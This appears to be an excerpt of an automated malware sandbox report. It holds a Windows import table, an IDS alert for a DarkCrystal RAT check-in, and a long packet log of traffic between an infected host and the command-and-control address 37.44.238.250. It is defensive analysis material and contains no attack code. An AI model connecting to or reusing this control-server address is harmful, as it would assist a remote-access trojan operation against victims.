| KERNEL32.dll | GetLastError, SetLastError, FormatMessageW, GetCurrentProcess, DeviceIoControl, SetFileTime, CloseHandle, CreateDirectoryW, RemoveDirectoryW, CreateFileW, DeleteFileW, CreateHardLinkW, GetShortPathNameW, GetLongPathNameW, MoveFileW, GetFileType, GetStdHandle, WriteFile, ReadFile, FlushFileBuffers, SetEndOfFile, SetFilePointer, SetFileAttributesW, GetFileAttributesW, FindClose, FindFirstFileW, FindNextFileW, InterlockedDecrement, GetVersionExW, GetCurrentDirectoryW, GetFullPathNameW, FoldStringW, GetModuleFileNameW, GetModuleHandleW, FindResourceW, FreeLibrary, GetProcAddress, GetCurrentProcessId, ExitProcess, SetThreadExecutionState, Sleep, LoadLibraryW, GetSystemDirectoryW, CompareStringW, AllocConsole, FreeConsole, AttachConsole, WriteConsoleW, GetProcessAffinityMask, CreateThread, SetThreadPriority, InitializeCriticalSection, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, SetEvent, ResetEvent, ReleaseSemaphore, WaitForSingleObject, CreateEventW, CreateSemaphoreW, GetSystemTime, SystemTimeToTzSpecificLocalTime, TzSpecificLocalTimeToSystemTime, SystemTimeToFileTime, FileTimeToLocalFileTime, LocalFileTimeToFileTime, FileTimeToSystemTime, GetCPInfo, IsDBCSLeadByte, MultiByteToWideChar, WideCharToMultiByte, GlobalAlloc, LockResource, GlobalLock, GlobalUnlock, GlobalFree, LoadResource, SizeofResource, SetCurrentDirectoryW, GetExitCodeProcess, GetLocalTime, GetTickCount, MapViewOfFile, UnmapViewOfFile, CreateFileMappingW, OpenFileMappingW, GetCommandLineW, SetEnvironmentVariableW, ExpandEnvironmentStringsW, GetTempPathW, MoveFileExW, GetLocaleInfoW, GetTimeFormatW, GetDateFormatW, GetNumberFormatW, DecodePointer, SetFilePointerEx, GetConsoleMode, GetConsoleCP, HeapSize, SetStdHandle, GetProcessHeap, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineA, GetOEMCP, RaiseException, GetSystemInfo, VirtualProtect, VirtualQuery, LoadLibraryExA, IsProcessorFeaturePresent, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, QueryPerformanceCounter, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, TerminateProcess, LocalFree, RtlUnwind, EncodePointer, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, LoadLibraryExW, QueryPerformanceFrequency, GetModuleHandleExW, GetModuleFileNameA, GetACP, HeapFree, HeapAlloc, HeapReAlloc, GetStringTypeW, LCMapStringW, FindFirstFileExA, FindNextFileA, IsValidCodePage |
| OLEAUT32.dll | SysAllocString, SysFreeString, VariantClear |
| gdiplus.dll | GdipAlloc, GdipDisposeImage, GdipCloneImage, GdipCreateBitmapFromStream, GdipCreateBitmapFromStreamICM, GdipCreateHBITMAPFromBitmap, GdiplusStartup, GdiplusShutdown, GdipFree |


| Language of compilation system | Country where language is spoken | Map |
|---|---|---|
| English | United States | |


| Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol |
|---|---|---|---|---|---|---|---|---|
| 2024-12-20T21:17:27.910497+0100 | 2048095 | ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) | 1 | 192.168.2.4 | 49732 | 37.44.238.250 | 80 | TCP |

Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                                      Dec 20, 2024 21:17:29.410502911 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:29.420838118 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:29.420860052 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:29.608760118 CET804973437.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:29.660481930 CET4973480192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:29.848563910 CET804973437.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:29.863013029 CET4973480192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:29.983280897 CET804973437.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:30.081082106 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:30.088712931 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:30.207930088 CET4973480192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:30.208157063 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:30.273545980 CET804973437.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:30.316737890 CET4973480192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:30.328037024 CET804973437.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:30.328047991 CET804973437.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:30.328057051 CET804973437.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:30.441862106 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:30.496216059 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:30.551136971 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:30.561573982 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:30.561588049 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:30.690798044 CET804973437.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:30.738595963 CET4973480192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:30.923456907 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:30.925278902 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:30.982057095 CET4973480192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:31.028789043 CET4973680192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:31.044831991 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:31.103579998 CET804973437.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:31.103648901 CET4973480192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:31.148624897 CET804973637.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:31.148716927 CET4973680192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:31.148885965 CET4973680192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:31.268357992 CET804973637.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:31.270046949 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:31.333606958 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:31.379210949 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:31.389797926 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:31.389843941 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:31.504317999 CET4973680192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:31.625309944 CET804973637.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:31.625320911 CET804973637.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:31.625459909 CET804973637.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:32.047070980 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:32.049681902 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:32.169152975 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:32.395031929 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:32.419121027 CET804973637.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:32.456074953 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:32.472965002 CET4973680192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:32.504221916 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:32.514636040 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:32.514719963 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:32.656558990 CET804973637.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:32.707339048 CET4973680192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:32.982656002 CET4973680192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:32.991168976 CET4973880192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:33.103236914 CET804973637.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:33.103281021 CET4973680192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:33.110667944 CET804973837.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:33.110728979 CET4973880192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:33.110857964 CET4973880192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:33.167135000 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:33.168375969 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:33.230403900 CET804973837.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:33.288103104 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:33.462671995 CET4973880192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:33.520263910 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:33.575042009 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:33.582345963 CET804973837.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:33.582510948 CET804973837.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:33.582520008 CET804973837.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:33.639998913 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:33.640043020 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:33.692096949 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:34.292088985 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:34.293745995 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:34.381798983 CET804973837.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:34.413388014 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:34.488605976 CET4973880192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:34.616730928 CET804973837.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:34.644938946 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:34.676129103 CET4973880192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:34.700458050 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:34.764653921 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:34.764719963 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:34.785471916 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:35.417982101 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:35.418946028 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:35.538465023 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:35.769962072 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:35.829335928 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:35.889667034 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:35.889777899 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:35.988591909 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:36.549071074 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:36.598542929 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:36.718435049 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:37.005177021 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:37.024113894 CET4973880192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:37.024547100 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:37.026977062 CET4974380192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:37.144294977 CET804973837.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:37.144362926 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:37.144391060 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:37.144438028 CET4973880192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:37.146609068 CET804974337.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:37.146688938 CET4974380192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:37.146848917 CET4974380192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:37.266330957 CET804974337.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:37.504343033 CET4974380192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:37.506726027 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:37.514307022 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:37.624257088 CET804974337.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:37.624269962 CET804974337.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:37.624380112 CET804974337.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:37.634186029 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:37.863684893 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:37.920780897 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:37.983331919 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:37.983374119 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:37.988739014 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:38.417773008 CET804974337.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:38.488708973 CET4974380192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:38.644603968 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:38.645658016 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:38.652527094 CET804974337.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:38.765424013 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:38.785497904 CET4974380192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:38.827769995 CET4974380192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:38.926901102 CET4974480192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:38.947597027 CET804974337.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:38.947665930 CET4974380192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:39.004477978 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:39.047538042 CET804974437.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:39.047616959 CET4974480192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:39.047769070 CET4974480192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:39.052202940 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:39.124537945 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:39.124645948 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:39.167699099 CET804974437.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:39.177151918 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:39.394994020 CET4974480192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:39.486443043 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:39.498042107 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:39.514818907 CET804974437.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:39.514828920 CET804974437.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:39.514852047 CET804974437.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:39.617672920 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:39.848104000 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:50.219391108 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:50.219440937 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:50.219446898 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:50.219475031 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:50.219495058 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:50.219518900 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:50.219552040 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:50.219561100 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:50.219609022 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:50.219609976 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:50.219619989 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:50.219672918 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:50.219707012 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:50.219716072 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:50.219722986 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:50.219763041 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:50.219777107 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:50.219840050 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:50.219856024 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:50.219865084 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:50.219893932 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:50.219923973 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:50.219959974 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:50.219969034 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:50.220015049 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:50.220055103 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:50.220065117 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:50.220077991 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:50.220088005 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:50.220104933 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:50.220105886 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:50.220134020 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:50.220163107 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:50.220166922 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:50.220175982 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:50.220185041 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:50.220221043 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:50.220233917 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:50.254247904 CET4975180192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:50.337928057 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:50.337991953 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:50.338006020 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:50.338046074 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:50.338186026 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:50.338195086 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:50.338253975 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:50.338289022 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:50.338298082 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:50.338339090 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:50.338613033 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:50.338622093 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:50.338665962 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:50.338742018 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:50.338751078 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:50.338797092 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:50.339009047 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:50.339018106 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:50.339063883 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:50.339174986 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:50.339229107 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:50.339293003 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:50.339302063 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:50.339306116 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:50.339349031 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:50.339554071 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:50.339562893 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:50.339572906 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:50.339617968 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:50.339627028 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:50.339696884 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:50.339705944 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:50.339802027 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:50.339835882 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:50.339879036 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:50.339888096 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:50.339939117 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:50.339946985 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:50.340084076 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:50.340094090 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:50.340183973 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:50.340193033 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:50.340203047 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:50.340270042 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:50.340306044 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:50.340316057 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:50.340425968 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:50.340435028 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:50.340442896 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:50.340451002 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:50.340485096 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:50.340639114 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:50.340648890 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:50.340656996 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:50.340665102 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:50.340676069 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:50.340785980 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:50.340794086 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:50.340833902 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:50.340842962 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:50.340893984 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:50.340903044 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:50.340918064 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:50.340944052 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:50.340996981 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:50.341006041 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:50.341161013 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:50.341170073 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:50.341177940 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:50.341187000 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:50.341198921 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:50.341221094 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:50.341289043 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:50.341298103 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:50.341376066 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:50.341432095 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:50.341489077 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:50.341497898 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:50.341531038 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:50.341559887 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:50.341718912 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:50.341727972 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:50.341742039 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:50.341778994 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:50.341787100 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:50.341798067 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:50.341882944 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:50.341892004 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:50.341898918 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:50.341907978 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:50.342005014 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:50.342015982 CET804973237.44.238.250192.168.2.4
